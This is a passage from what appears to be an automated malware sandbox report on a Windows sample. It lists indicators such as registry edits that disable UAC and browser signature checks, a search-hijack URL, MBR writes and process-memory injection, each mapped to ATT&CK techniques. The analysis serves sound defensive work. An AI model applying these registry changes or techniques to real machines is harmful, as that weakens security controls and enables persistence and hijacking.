Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\R:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\U:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\Q:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\S:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\T:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\G:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\I:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\K:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\P:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\O:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\Y:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\E:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\H:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\J:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\M:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\X:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\Z:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\L:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\N:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\V:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened (read-only)	\??\W:	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2984 set thread context of 2088	2984	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	31

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mofcomp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe

Modifies Internet Explorer settings 1 TTPs 11 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\ltHI = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://findgala.com/?&uid=2269&q={searchTerms}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IIL = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\ltTST = "1266"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2269&q={searchTerms}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2269&q={searchTerms}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2269&q={searchTerms}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Modifies registry class 16 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.DocHostUIHandler\Clsid	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Software	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.DocHostUIHandler	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.DocHostUIHandler\ = "Implements DocHostUIHandler"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Software\Microsoft	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Software\Microsoft\Internet Explorer	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=2269&q={searchTerms}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.DocHostUIHandler"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Software\Microsoft\Internet Explorer\SearchScopes	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeSecurityPrivilege	1220	mofcomp.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2984 wrote to memory of 2088	2984	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	31
PID 2984 wrote to memory of 2088	2984	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	31
PID 2984 wrote to memory of 2088	2984	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	31
PID 2984 wrote to memory of 2088	2984	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	31
PID 2984 wrote to memory of 2088	2984	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	31
PID 2984 wrote to memory of 2088	2984	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	31
PID 2088 wrote to memory of 1220	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	32
PID 2088 wrote to memory of 1220	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	32
PID 2088 wrote to memory of 1220	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	32
PID 2088 wrote to memory of 1220	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	32
PID 2088 wrote to memory of 1512	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	33
PID 2088 wrote to memory of 1512	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	33
PID 2088 wrote to memory of 1512	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	33
PID 2088 wrote to memory of 1512	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	33
PID 2088 wrote to memory of 3020	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	36
PID 2088 wrote to memory of 3020	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	36
PID 2088 wrote to memory of 3020	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	36
PID 2088 wrote to memory of 3020	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	36
PID 2088 wrote to memory of 888	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	38
PID 2088 wrote to memory of 888	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	38
PID 2088 wrote to memory of 888	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	38
PID 2088 wrote to memory of 888	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	38
PID 2088 wrote to memory of 1928	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	40
PID 2088 wrote to memory of 1928	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	40
PID 2088 wrote to memory of 1928	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	40
PID 2088 wrote to memory of 1928	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	40
PID 2088 wrote to memory of 1744	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	43
PID 2088 wrote to memory of 1744	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	43
PID 2088 wrote to memory of 1744	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	43
PID 2088 wrote to memory of 1744	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	43
PID 2088 wrote to memory of 1756	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	45
PID 2088 wrote to memory of 1756	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	45
PID 2088 wrote to memory of 1756	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	45
PID 2088 wrote to memory of 1756	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	45
PID 2088 wrote to memory of 844	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	47
PID 2088 wrote to memory of 844	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	47
PID 2088 wrote to memory of 844	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	47
PID 2088 wrote to memory of 844	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	47
PID 2088 wrote to memory of 1500	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	49
PID 2088 wrote to memory of 1500	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	49
PID 2088 wrote to memory of 1500	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	49
PID 2088 wrote to memory of 1500	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	49
PID 2088 wrote to memory of 2920	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	51
PID 2088 wrote to memory of 2920	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	51
PID 2088 wrote to memory of 2920	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	51
PID 2088 wrote to memory of 2920	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	51
PID 2088 wrote to memory of 1300	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	53
PID 2088 wrote to memory of 1300	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	53
PID 2088 wrote to memory of 1300	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	53
PID 2088 wrote to memory of 1300	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	53
PID 2088 wrote to memory of 2584	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	55
PID 2088 wrote to memory of 2584	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	55
PID 2088 wrote to memory of 2584	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	55
PID 2088 wrote to memory of 2584	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	55
PID 2088 wrote to memory of 2032	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	58
PID 2088 wrote to memory of 2032	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	58
PID 2088 wrote to memory of 2032	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	58
PID 2088 wrote to memory of 2032	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	58
PID 2088 wrote to memory of 1080	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	60
PID 2088 wrote to memory of 1080	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	60
PID 2088 wrote to memory of 1080	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	60
PID 2088 wrote to memory of 1080	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	60
PID 2088 wrote to memory of 1516	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	62
PID 2088 wrote to memory of 1516	2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe	62

System policy modification 1 TTPs 7 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "2"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "2"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe" "C:\Users\Admin\AppData\Local\Temp\eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe"
  2⤵
  - UAC bypass
  - Enumerates VirtualBox registry keys
  - Blocks application from running via registry modification
  - Drops file in Drivers directory
  - Event Triggered Execution: Image File Execution Options Injection
  - Loads dropped DLL
  - Adds Run key to start application
  - Checks for any installed AV software in registry
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Writes to the Master Boot Record (MBR)
